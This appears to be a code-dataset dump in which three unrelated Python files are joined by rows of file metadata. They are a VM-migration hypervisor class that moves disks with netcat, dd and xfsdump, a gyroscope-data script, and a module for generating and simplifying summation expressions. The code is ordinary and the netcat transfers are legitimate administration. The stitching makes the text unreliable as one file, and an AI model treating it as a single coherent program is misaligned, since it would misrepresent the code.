with target_hypervisor.xfsrestore(vm, transaction) as listener:
self.xfsdump(vm, listener, transaction)
target_hypervisor.wait_for_xfsrestore(vm)
target_hypervisor.check_xfsrestore_log(vm)
target_hypervisor.umount_vm_storage(vm)
target_hypervisor.define_vm(vm, transaction)
else:
# For online migrations always use same volume name as VM
# already has.
target_hypervisor.create_vm_storage(
vm, transaction,
vm.hypervisor.get_volume_by_vm(vm).name(),
)
migrate_live(self, target_hypervisor, vm, self._get_domain(vm))
def total_vm_memory(self):
"""Get amount of memory in MiB available to hypervisor"""
# Start with what OS sees as total memory (not installed memory)
total_mib = self.conn().getMemoryStats(-1)['total'] // 1024
# Always keep some extra memory free for Hypervisor
total_mib -= HOST_RESERVED_MEMORY_MIB[self.get_storage_type()]
return total_mib
def free_vm_memory(self) -> int:
"""Get memory in MiB available (unallocated) on the hypervisor"""
total_mib = self.total_vm_memory()
# Calculate memory used by other VMs.
# We can not trust conn().getFreeMemory(), sum up memory used by
# each VM instead
used_mib = 0
for dom in self.conn().listAllDomains():
# Since every VM has its own overhead in QEMU, we must account for
# it accordingly, and not once overall for the whole HV.
used_mib += dom.info()[2] // 1024 + VM_OVERHEAD_MEMORY_MIB
return total_mib - used_mib
def start_vm(self, vm):
log.info('Starting "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
if self._get_domain(vm).create() != 0:
raise HypervisorError('"{0}" failed to start'.format(vm.fqdn))
def vm_defined(self, vm):
return self._find_domain(vm) is not None
def vm_running(self, vm):
"""Check if the VM is kinda running using libvirt
Libvirt has a state called "RUNNING", but it is not we want in here.
The callers of this function expect us to cover all possible states
the VM is somewhat alive. So we return true for all states before
"SHUTOFF" state including "SHUTDOWN" which actually only means
"being shutdown". If we would return false for this state
then consecutive start() call would fail.
"""
return self._get_domain(vm).info()[0] < VIR_DOMAIN_SHUTOFF
def stop_vm(self, vm):
log.info('Shutting down "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
if self._get_domain(vm).shutdown() != 0:
raise HypervisorError('Unable to stop "{}".'.format(vm.fqdn))
def stop_vm_force(self, vm):
log.info('Force-stopping "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
if self._get_domain(vm).destroy() != 0:
raise HypervisorError(
'Unable to force-stop "{}".'.format(vm.fqdn)
)
def undefine_vm(self, vm, keep_storage=False):
if self.vm_running(vm):
raise InvalidStateError(
'Refusing to undefine running VM "{}"'.format(vm.fqdn)
)
log.info('Undefining "{}" on "{}"'.format(vm.fqdn, self.fqdn))
if not keep_storage:
# XXX: get_volume_by_vm depends on domain names to find legacy
# domains w/o an uid_name. The order is therefore important.
self.get_volume_by_vm(vm).delete()
if self._get_domain(vm).undefine() != 0:
raise HypervisorError('Unable to undefine "{}".'.format(vm.fqdn))
def redefine_vm(self, vm, new_fqdn=None):
# XXX: vm_lv_update_name depends on domain names to find legacy domains
# w/o an uid_name. The order is therefore important.
self.vm_lv_update_name(vm)
self.undefine_vm(vm, keep_storage=True)
# XXX: undefine_vm depends on vm.fqdn beeing the old name for finding
# legacy domains w/o an uid_name. The order is therefore important.
vm.fqdn = new_fqdn or vm.fqdn
self.define_vm(vm)
def _vm_sync_from_hypervisor(self, vm, result):
vm_info = self._get_domain(vm).info()
mem = int(vm_info[2] / 1024)
if mem > 0:
result['memory'] = mem
num_cpu = vm_info[3]
if num_cpu > 0:
result['num_cpu'] = num_cpu
def vm_info(self, vm):
"""Get runtime information about a VM"""
props = DomainProperties.from_running(self, vm, self._get_domain(vm))
return props.info()
def get_free_disk_size_gib(self, safe=True):
"""Return free disk space as float in GiB"""
pool_info = self.get_storage_pool().info()
# Floor instead of ceil because we check free instead of used space
vg_size_gib = math.floor(float(pool_info[3]) / 1024 ** 3)
if safe is True:
vg_size_gib -= RESERVED_DISK[self.get_storage_type()]
return vg_size_gib
def mount_temp(self, device, suffix=''):
"""Mounts given device into temporary path"""
mount_dir = self.run('mktemp -d --suffix {}'.format(suffix))
self.run('mount {0} {1}'.format(device, mount_dir))
return mount_dir
def umount_temp(self, device_or_path):
"""Unmounts a device or path
Sometimes it is impossible to immediately umount a directory due to
a process still holding it open. It happens often when igvm is stopped.
Underlying process such puppetrun won't die immediately.
"""
retry = 10
for i in range(0, retry):
if i > 0:
log.warning(
'Umounting {} failed, attempting again in a moment. '
'{} attempts left.'
.format(device_or_path, retry - i)
)
sleep(1)
res = self.run(
'umount {0}'.format(device_or_path),
warn_only=(i < retry - 1),
)
if res.succeeded:
return
def remove_temp(self, mount_path):
self.run('rmdir {0}'.format(mount_path))
def format_storage(self, device, options):
self.run('mkfs.xfs -f {} {}'.format(' '.join(options), device))
def check_netcat(self, port):
pid = self.run(
'pgrep -f "^/bin/nc.openbsd -l -p {}"'
.format(port),
warn_only=True,
silent=True
)
if pid:
raise StorageError(
'Listening netcat already found on destination hypervisor.'
)
def kill_netcat(self, port):
self.run(
'pkill -f "^/bin/nc.openbsd -l -p {}"'.format(port),
warn_only=True, # It's fine if the process already dead
)
def _netcat_port(self, device: str) -> int:
"""
Get the minor ID for the device, calculates the netcat listen port for
it, checks if netcat process already except, and returns the port
"""
dev_minor = self.run('stat -L -c "%T" {}'.format(device), silent=True)
dev_minor = int(dev_minor, 16)
port = 7000 + dev_minor
self.check_netcat(port)
return port
@contextmanager
def netcat_to_device(self, device: str) -> Iterator[Tuple[str, int]]:
"""
Spawns the backgroung netcat process on the uniq port and pipes the
payload to dd process to restore the file system on a target
hypervisor. Kills the netcat process if exceprion is cought.
:param str device: The path to the volume device
:rtype Iterator[Tuple[str, int]]: (fqdn, port) pair
"""
port = self._netcat_port(device)
# Using DD lowers load on device with big enough Block Size
self.run(
'nohup /bin/nc.openbsd -l -p {0} | dd of={1} obs=1048576 &'
.format(port, device),
pty=False, # Has to be here for background processes
)
try:
yield self.fqdn, port
except BaseException:
self.kill_netcat(port)
raise
def device_to_netcat(
self, device: str, size: int, listener: Tuple[str, int]
):
"""
Dumps the device via dd and netcat to a remote listener
:param str device: The path to the volume device
:param int size: The disk size for pv progress and ETA
:listener Tuple[str, int] listener: (fqdn, port) pair for nc connection
"""
# Using DD lowers load on device with big enough Block Size
self.run(
'dd if={0} ibs=1048576 | pv -f -s {1} '
'| /bin/nc.openbsd -q 1 {2} {3}'
.format(device, size, listener[0], listener[1])
)
def _xfsrestore_log_name(self, vm: VM) -> str:
device_name = self.get_volume_by_vm(vm).name()
return '/tmp/xfsrestore-{}.log'.format(device_name)
def check_xfsrestore_log(self, vm: VM):
"""
Search for WARNING in the xfsrestore log file.
Raises exception if found
"""
self.run('cat {}'.format(self._xfsrestore_log_name(vm)))
try:
self.run('grep -qE "WARNING|failed: end of recorded data" {} && '
'exit 1 || exit 0'
.format(self._xfsrestore_log_name(vm)))
except RemoteCommandError:
raise XfsMigrationError('xfs dump/restore caused warnings')
@contextmanager
def xfsrestore(
self, vm: VM, transaction: Transaction = None,
) -> Iterator[Tuple[str, int]]:
"""
Formats a vm's storage, mounts it, spawns background netcat process
and pipes the load to xfsrestore command to restore xfsdump on the
target HV
:param VM vm: The migrating VM
:param Transaction transaction: The transaction to rollback
:rtype Iterator[Tuple[str, int]]: (fqdn, port) pair
"""
device = self.get_volume_by_vm(vm).path()
port = self._netcat_port(device)
mount_dir = self.format_vm_storage(vm, transaction)
# xfsrestore args:
# -F: Don't prompt the operator.
# -J: inhibits inventory update
# xfsrestore needs to output its logs, otherwise it fails
self.run(
'nohup /bin/nc.openbsd -l -p {0} '
'| xfsrestore -F -J - {1} 2>{2} 1>&2 &'
.format(port, mount_dir, self._xfsrestore_log_name(vm)),
pty=False, # Has to be here for background processes
)
try:
yield self.fqdn, port
except BaseException:
self.kill_netcat(port)
raise
def wait_for_xfsrestore(self, vm: VM):
"""
On the HV with slow IO the process must wait until xfsrestore is done
"""
mount_dir = self.vm_mount_path(vm)
self.run(
'while pgrep -f "^xfsrestore -F -J - {0}"; do sleep 1; done'
.format(mount_dir)
)
def xfsdump(self, vm: VM, listener, transaction: Transaction = None):
"""
Mounts the vm's storage, and then dumps the device via xfsdump and
netcat to a remote listener
:param VM vm: The migrating VM
:param Transaction transaction: The transaction to rollback
"""
mount_dir = self.mount_vm_storage(vm, transaction)
# xfsdump args:
# -l: level 0 is an absolute dump
# -F: Don't prompt the operator.
# -J: inhibits inventory update
# -p: progress update interval
self.run(
'xfsdump -o -l 0 -F -J -p 1 - {0} '
'| /bin/nc.openbsd -q 1 {1} {2}'
.format(mount_dir, listener[0], listener[1]),
)
self.umount_vm_storage(vm)
def estimate_cpu_cores_used(self, vm: VM) -> float:
"""Estimate the number of CPU cores used by the VM
Estimate the number of CPU cores used by the VM on the Hypervisor
based on the known data of the past 24 hours by using the mathematical
quotient of the VM performance value and the Hypervisors
cpu_perffactor.
:param: vm: VM object
:return: number of CPU cores used on Hypervisor
"""
vm_performance_value = vm.performance_value()
# Serveradmin can not handle floats right now so we safe them as
# multiple ones of thousand and just divide them here again.
hv_cpu_perffactor = self.dataset_obj['cpu_perffactor'] / 1000
cpu_cores_used = vm_performance_value / hv_cpu_perffactor
return float(cpu_cores_used)
def estimate_vm_cpu_usage(self, vm: VM) -> float:
"""Estimate CPU usage of a VM on the Hypervisor
Estimate the CPU usage (as percent) on the Hypervisor.
:param: vm: VM object
:return: CPU usage on Hypervisor (as percent)
"""
vm_cpu_cores = self.estimate_cpu_cores_used(vm)
hv_num_cpu = self.dataset_obj['num_cpu']
cpu_usage = (vm_cpu_cores / hv_num_cpu) * 100
return float(cpu_usage)
def estimate_cpu_usage(self, vm: VM) -> float:
"""Estimate the Hypervisor CPU usage with given VM
Estimate the total CPU usage of the Hypervisor with the given VM on top
based on the data we have from the past 24 hours.
:param: vm: VM object
:return: Cpu utilisation in percent as float
"""
vm_cpu_usage = self.estimate_vm_cpu_usage(vm)
hv_cpu_usage = self.dataset_obj['cpu_util_pct']
# Take into account cpu_util_pct is outdated
#
# Take into account recent migrations from and to the Hypervisor to
# avoid moving too many VMs to the same Hypervisor or discarding the
# Hypervisor as candidate because the cpu_util_pct is not up-to-date
# yet.
#
# The migration_log logs the migration of the past 24 hours after that
# the cpu_util_pct should have up-to-date values.
cpu_usage = sum([
hv_cpu_usage,
vm_cpu_usage,
self.cpu_usage_of_recent_migrations(),
])
# TODO: The sum of estimated CPU usage can be negative because
# cpu_usage_of_recent_migrations() can be negative.
# Make this more stable and account for this discrepancy.
# I.e. some if not all of the inputs are wrong!
if cpu_usage < 0:
log.error(
'Estimated CPU usage for Hypervisor "{}" and VM "{}" is '
'negative! Beware that this can lead to wrong '
'assumptions! Setting to zero!'.format(
str(self),
str(vm),
)
)
cpu_usage = max(0, cpu_usage)
return float(cpu_usage)
def cpu_usage_of_recent_migrations(self) -> int:
"""Summarized CPU usage of recent VM migrations
Summarize the CPU usage of VMs recently migrated from or to this
Hypervisor and return the total.
:return: Total CPU usage of recently moved VMs
"""
migration_log = self.dataset_obj['igvm_migration_log']
total_cpu_usage = 0
for vm_migration_log in migration_log:
cpu_usage = vm_migration_log.split(' ')[1]
total_cpu_usage = total_cpu_usage + int(cpu_usage)
return total_cpu_usage
def log_migration(self, vm: VM, operator: str) -> None:
"""Log migration to or from Hypervisor
Save the estimated CPU usage of the VM to the migration log to be able
to take recent migrations into account when this Hypervisor is selected
as possible candidate.
:param vm: VM object
:param operator: plus for migration to HV, minus for migration from HV
"""
cpu_usage_vm = self.estimate_vm_cpu_usage(vm)
timestamp = int(time())
log_entry = '{} {}{}'.format(timestamp, operator, round(cpu_usage_vm))
self.dataset_obj['igvm_migration_log'].add(log_entry)
self.dataset_obj.commit()
| 37.069686 | 79 | 0.580388 | 5,243 | 42,556 | 4.525653 | 0.141713 | 0.015425 | 0.016689 | 0.008766 | 0.275076 | 0.204442 | 0.15547 | 0.108142 | 0.080496 | 0.067557 | 0 | 0.006446 | 0.32919 | 42,556 | 1,147 | 80 | 37.102005 | 0.824745 | 0.217126 | 0 | 0.18 | 0 | 0.001333 | 0.146053 | 0.006681 | 0 | 0 | 0 | 0.000872 | 0 | 1 | 0.084 | false | 0 | 0.021333 | 0.001333 | 0.158667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ff6af002204700fbd6b844b12cc508cbdc90c4 | 1,092 | py | Python | app/src/main/python/main.py | bulaikexiansheng/BlueChatApp3 | ce326b3589009c47bdc65e100bd88fe16054cdc8 | [
"MIT"
] | null | null | null | app/src/main/python/main.py | bulaikexiansheng/BlueChatApp3 | ce326b3589009c47bdc65e100bd88fe16054cdc8 | [
"MIT"
] | null | null | null | app/src/main/python/main.py | bulaikexiansheng/BlueChatApp3 | ce326b3589009c47bdc65e100bd88fe16054cdc8 | [
"MIT"
] | null | null | null | import re
import numpy as np
import pandas as pd
import Deployment
def delete_prefix(data):
for i in range(len(data)):
data[i] = data[i][2:]
return data
if __name__ == '__main__':
data_path = './test_data/'
for index in range(6):
raw_data = pd.read_table(filepath_or_buffer=data_path + 'txt/'+ str(index) + '.txt')
raw_data = np.array(raw_data).reshape(-1)
line = ''.join(raw_data)
expression = ['(?:GX|GX-)\d+\.?\d*', '(?:GY|GY-)\d+\.?\d*', '(?:GZ|GZ-)\d+\.?\d*']
data = []
for i in range(len(expression)):
channel = delete_prefix(re.compile(expression[i]).findall(line))
channel = np.array(channel).astype(float)
data.append(channel)
data = np.array(data).astype(float)
for i in range(int(len(data[0])/20)):
label = Deployment.predict(data[:, i*20:(i+1)*20].transpose())
print(data[:, i*20:(i+1)*20].transpose())
# if label != 4:
print(str(index) + ' label:' +str(label))
pass | 33.090909 | 93 | 0.535714 | 148 | 1,092 | 3.817568 | 0.398649 | 0.049558 | 0.031858 | 0.058407 | 0.134513 | 0.134513 | 0.070796 | 0 | 0 | 0 | 0 | 0.021574 | 0.278388 | 1,092 | 33 | 94 | 33.090909 | 0.695431 | 0.012821 | 0 | 0 | 0 | 0 | 0.088038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0.038462 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ffc0645f312017bac40fdac72356eef15c8019 | 15,756 | py | Python | rlo/src/rlo/summations.py | tomjaguarpaw/knossos-ksc | 8fa75e67c0db8f632b135379740051cd10ff31f2 | [
"MIT"
] | 31 | 2021-09-09T16:09:55.000Z | 2022-02-20T02:15:19.000Z | rlo/src/rlo/summations.py | tomjaguarpaw/knossos-ksc | 8fa75e67c0db8f632b135379740051cd10ff31f2 | [
"MIT"
] | 40 | 2021-08-06T14:30:08.000Z | 2022-01-19T08:49:52.000Z | rlo/src/rlo/summations.py | tomjaguarpaw/knossos-ksc | 8fa75e67c0db8f632b135379740051cd10ff31f2 | [
"MIT"
] | 5 | 2021-08-06T11:20:31.000Z | 2022-01-07T19:39:40.000Z | from typing import Dict, Iterable, List, Mapping, NamedTuple, Optional, Sequence, Tuple
from functools import reduce
import collections
import itertools
import numpy as np
import operator
import random
from rlo.expression import Expression
from rlo.expression_util import SymtabAndDefs, ExprWithEnv
from rlo import rewrites
from rlo import utils
from ksc.type import Type
def _inplace_add_term_dicts(dict1, dict2):
for var, coeff in dict2.items():
dict1.setdefault(var, 0)
dict1[var] += coeff
def _collect_terms_into_dict(expr: Expression):
if expr.op == "variable":
return {expr.name: 1}
elif expr.op == "constant":
return {"": int(expr.value)}
elif expr.op == "add":
lhs = _collect_terms_into_dict(expr.children[0])
_inplace_add_term_dicts(lhs, _collect_terms_into_dict(expr.children[1]))
return lhs
elif expr.op == "sub":
lhs = _collect_terms_into_dict(expr.children[0])
_inplace_add_term_dicts(
lhs,
{
var: -coeff
for var, coeff in _collect_terms_into_dict(expr.children[1]).items()
},
)
return lhs
else:
raise ValueError(
"Cannot collect terms for expression containing operation {}".format(
expr.op
)
)
def _sum_of_expressions(exprs):
return reduce(operator.add, exprs)
def _make_variable(name):
return Expression.Variable(name, type=Type.Integer)
def _sum_of_variables(variable_names):
return _sum_of_expressions(_make_variable(v) for v in variable_names)
_symtab_and_defs = SymtabAndDefs()
def optimize_by_collecting_terms(expr: Expression) -> ExprWithEnv:
""" Optimize an expression of the form term0 + term1 + term2 + ... + termN,
where each term is either a constant or a variable.
The procedure is to collect up terms in the same variable, then
collect up variables which have the same resulting coefficient.
This is guaranteed to return the optimal rewrite for many classes
of input expressions, for example if each variable appears exactly
once with coefficient 1. More generally, if there is no coefficient
greater than 1 that appears exactly once, then this function will
return the best possible equivalent expression.
In the general case the optimal rewrite will depend on the rule set.
For example this function may return
4 + x1 + x2 + 2 * (x3 + x4 + x5 + x6) + 3 * x7
But an equivalent expression with lower cost is
4 + x1 + x2 + x7 + 2 * (x3 + x4 + x5 + x6 + x7)
However this may not be reachable for some rule sets. """
subexpressions = []
variables_by_coefficient: Dict = collections.defaultdict(
lambda: ([], [])
) # values are pairs (positive_terms, negative_terms)
for var, coeff in _collect_terms_into_dict(expr).items():
if var == "": # constant term
if coeff != 0:
subexpressions.append(Expression.Constant(coeff))
elif coeff > 0:
variables_by_coefficient[coeff][0].append(var)
elif coeff < 0:
variables_by_coefficient[-coeff][1].append(var)
pos_vars_coeff_1, neg_vars_coeff_1 = variables_by_coefficient[1]
subexpressions += [_make_variable(v) for v in pos_vars_coeff_1]
for coeff, (pos_vars, neg_vars) in variables_by_coefficient.items():
if coeff > 1:
if len(pos_vars) > 0:
if len(neg_vars) > 0:
subexpressions.append(
coeff
* (_sum_of_variables(pos_vars) - _sum_of_variables(neg_vars))
)
else:
subexpressions.append(coeff * _sum_of_variables(pos_vars))
else:
subexpressions.append((-coeff) * _sum_of_variables(neg_vars))
sum_exprs = (
_sum_of_expressions(subexpressions)
if len(subexpressions) > 0
else Expression.Constant(0)
)
return _symtab_and_defs.make_toplevel(
sum_exprs - _sum_of_variables(neg_vars_coeff_1)
if neg_vars_coeff_1
else sum_exprs
)
def try_optimize_by_collecting_terms(expr: Expression) -> Optional[ExprWithEnv]:
""" Return the optimized form if possible, or None if the input expression
is not a summation of the appropriate form """
try:
return optimize_by_collecting_terms(expr)
except ValueError:
return None
def _randomly_bracketed_sum(terms, rng):
""" Generate a sum of the given terms, where the terms appear in order
from left to right, but with random bracketing of terms.
This function generates every possible bracketing with equal probability.
"""
T = len(terms)
# Each possible bracketed summation can be written in prefix form, e.g.
# + + t1 + t2 t3 + t4 t5
# This sequence of operators and terms maps to a sequence of boolean values
# of length (2T-1) which describes the positions of the operators, i.e.
# [True True False True False False True False False]
# Conversely it can be shown that, given a sequence of boolean values of
# length (2T-1), of which exactly (T-1) values are True, there is exactly
# one rotation of this sequence which corresponds to a valid summation.
# So we can generate a random bracketing by first choosing a sequence
# of booleans at random ...
is_operator = [False] * (2 * T - 1)
for x in rng.sample(range(2 * T - 1), T - 1):
is_operator[x] = True
# ... and then finding the rotation which corresponds to a valid expression:
partial_sums = itertools.accumulate((1 if e else -1) for e in is_operator)
_, min_index = min(
(partial_sum, ind) for ind, partial_sum in enumerate(partial_sums)
)
is_operator = is_operator[min_index + 1 :] + is_operator[: min_index + 1]
# This sequence is then converted to an Expression:
term_index = 0
incomplete_nodes = [None]
for op in is_operator:
if op:
incomplete_nodes.append(None)
else:
val = terms[term_index]
term_index += 1
while incomplete_nodes[-1] is not None:
val = incomplete_nodes.pop() + val
incomplete_nodes[-1] = val
assert term_index == len(terms)
return utils.single_elem(incomplete_nodes)
def generate_sum(
num_terms: int, rng: random.Random, max_constant_term=2, fold=False
) -> ExprWithEnv:
""" Generate an example expression which is a sum of the specified number of terms.
There will be 2 or 3 constant terms in random positions. The remaining terms
are distinct variables. """
assert num_terms >= 3
distance_between_constant_terms = rng.randint((num_terms + 1) // 2, num_terms - 1)
first_constant_term = rng.randint(
0, num_terms - distance_between_constant_terms - 1
)
if rng.random() > 0.5:
constant_term_indices = [
first_constant_term,
first_constant_term + distance_between_constant_terms,
]
else:
constant_term_indices = [
first_constant_term,
first_constant_term + rng.randint(1, distance_between_constant_terms - 1),
first_constant_term + distance_between_constant_terms,
]
terms = []
variable_index = 0
for i in range(num_terms):
if i in constant_term_indices:
terms.append(Expression.Constant(rng.randint(1, max_constant_term)))
else:
terms.append(_make_variable("x{}".format(variable_index)))
variable_index += 1
return _symtab_and_defs.make_toplevel(
_sum_of_expressions(terms) if fold else _randomly_bracketed_sum(terms, rng)
)
def generate_sums(
n: int, min_terms: int, max_terms: int, *, seed=12345, fold=False, choose_from=None
) -> Optional[List[ExprWithEnv]]:
""" Generate the specified number of example expressions (with no duplicates).
The constants used in the expressions will normally have a maximum value of 2,
but this is increased if the number of examples requested is very large.
If choose_from is not None then the expressions will be randomly sampled from a
larger set of expressions, where the larger set consists of the expressions that
would be generated for n=choose_from.
"""
assert min_terms <= max_terms
if choose_from is None:
choose_from = n
else:
assert choose_from >= n
rng = random.Random(seed)
approx_different_sums = sum(
i * i * i for i in range(min_terms, max_terms + 1)
) # Crude approximation of the total number of examples that it is possible to generate with constants at most 2.
sums = set()
sums_list = []
for num_attempts in itertools.count():
num_terms = num_attempts % (max_terms - min_terms + 1) + min_terms
max_constant_term = num_attempts // approx_different_sums + 2
new_sum = generate_sum(num_terms, rng, max_constant_term, fold=fold)
if new_sum not in sums:
sums.add(new_sum)
sums_list.append(new_sum)
if len(sums_list) >= choose_from:
return sums_list if choose_from == n else rng.sample(sums_list, n)
return None
def _num_consts(e):
if e.op == "constant":
return 1
if not hasattr(e, "_num_consts"):
e._num_consts = sum(_num_consts(c) for c in e.children)
return e._num_consts
Subst = Mapping[str, Expression]
def _apply_subst(e: Expression, subst) -> Expression:
if e.op == "constant":
return e
if e.op == "variable":
return subst[e.name]
assert e.op == "add"
return _apply_subst(e.left, subst) + _apply_subst(e.right, subst)
class Step(NamedTuple):
prev_skel: Expression
rewritten: Expression # Rewrite of previous (may not be a skeleton: placeholder vars could be out of order)
rewritten_as_expr: Expression # The same rewrite, but turned back into a form equivalent to the original expression (no placeholders)
class SummationsExpert:
@staticmethod
def _skel_and_substs(e: Expression) -> Tuple[Expression, Subst]:
""" Returns a tuple of:
* the skeleton of an expression: a version of e with maximal subtrees containing no constants replaced by a placeholder variable,
where the placeholders are numbered e0, e1 etc. in increasing order left-right.
* the substitution from variable names to subtrees-containing-no-constants that gives back the original expression.
"""
subs: Dict[str, Expression] = {}
def helper(subexp):
if subexp.op == "constant":
return subexp
if _num_consts(subexp) == 0:
temp = _make_variable(f"e{len(subs)}")
subs[temp.name] = subexp
return temp
assert subexp.op == "add"
return helper(subexp.left) + helper(subexp.right)
res = helper(e)
assert _apply_subst(res, subs) == e
return res, subs
def __init__(self, num_time_heads=None):
# Cache the next step along the best path for *skeletons* only.
# Here we allow the cache to grow without bound, but we could use any eviction policy.
self._cache = {}
self._num_time_heads = num_time_heads
self._rules = rewrites.RuleSet(
[rewrites.rule(n) for n in ["assoc_add_add", "commute_add", "cprop_add"]]
)
def get_sequence(self, exprenv: ExprWithEnv) -> List[ExprWithEnv]:
assert exprenv.env is _symtab_and_defs
return [
_symtab_and_defs.make_toplevel(e)
for e in self.get_sequence_expr(exprenv.expr)
]
def get_sequence_expr(self, e: Expression) -> List[Expression]:
if len(e.children) == 0:
return []
l, r = _num_consts(e.left), _num_consts(e.right)
if l + r <= 1:
return []
if l == 0:
return [
e.clone_with_new_children([e.left, s])
for s in self.get_sequence_expr(e.right)
]
if r == 0:
return [
e.clone_with_new_children([s, e.right])
for s in self.get_sequence_expr(e.left)
]
seq = self._search_to_smaller(e)
return seq + self.get_sequence_expr(seq[-1])
def _search_to_smaller(self, e: Expression) -> List[Expression]:
# Return sequence of Expressions, each being one rewrite from the previous (the first one rewrite from e),
# to an expression whose skeleton is smaller than e
def possible_next_steps(skel) -> Sequence[Expression]:
if skel in self._cache:
# We know the best thing to do with this skeleton, there is only one possibility
return [self._cache[skel]]
# Don't yet know which rewrite to do. Each rewrite is a possibility.
return [
rw.apply_expr(skel) for rw in self._rules.get_all_rewrites_expr(skel)
]
assert _num_consts(e) > 1
skel1, substs1 = self._skel_and_substs(e)
cands: Dict[Expression, Tuple[List[Step], Subst]] = {skel1: ([], substs1)}
# Breadth-first search to the nearest Expression with a smaller skeleton.
# 4 steps believed sufficient for any Expr (with <=3 constants).
for _ in range(4):
ncands = {}
for cand_skel, (seq, substs) in cands.items():
for next_step in possible_next_steps(cand_skel):
# next_step is the result of a rewrite, using vars from cand_skel
# (not necessarily a skeleton: placeholder vars could be out of order)
# Get back the actual non-skeleton expression, and convert to a valid skeleton (with placeholders numbered L-R)
next_as_expr = _apply_subst(next_step, substs)
nskel, nsubsts = self._skel_and_substs(next_as_expr)
ncands[nskel] = (
seq + [Step(cand_skel, next_step, next_as_expr)],
nsubsts,
)
best = min(ncands, key=lambda skel: skel.num_nodes)
if best.num_nodes < skel1.num_nodes:
seq, _ = ncands[best]
res = []
# Found sequence. Record each step. (Possibly worth it only for sequences of length>1 or excluding cprop_add's?)
for skel, nskel, next_as_expr in seq:
self._cache[skel] = nskel
res.append(next_as_expr)
return res
cands = ncands
raise ValueError(
"\n".join(
[
f"Could not reduce skeleton of {e} from {skel1}, candidates: {cands.keys()}"
]
)
)
def evaluate_all_time_left(self, exprenvs: Iterable[ExprWithEnv]) -> np.ndarray:
def eval(e):
seq = self.get_sequence(e)
cost_seq = [0] + [e.cost() - s.cost() for s in seq]
if self._num_time_heads is not None:
cost_seq = cost_seq[: self._num_time_heads]
cost_seq += cost_seq[-1:] * (self._num_time_heads - len(cost_seq))
return cost_seq
data = [eval(exprenv) for exprenv in exprenvs]
if self._num_time_heads is None:
res = np.array(data, dtype=object) # May be jagged
else:
res = np.array(data, dtype=float)
assert len(res.shape) == 2
return res
| 39.888608 | 145 | 0.626174 | 2,075 | 15,756 | 4.56 | 0.195663 | 0.017755 | 0.008878 | 0.012682 | 0.175122 | 0.120799 | 0.101036 | 0.067956 | 0.047347 | 0.01226 | 0 | 0.011139 | 0.293476 | 15,756 | 394 | 146 | 39.989848 | 0.838843 | 0.265613 | 0 | 0.120567 | 0 | 0 | 0.022497 | 0 | 0 | 0 | 0 | 0 | 0.035461 | 1 | 0.074468 | false | 0 | 0.042553 | 0.010638 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |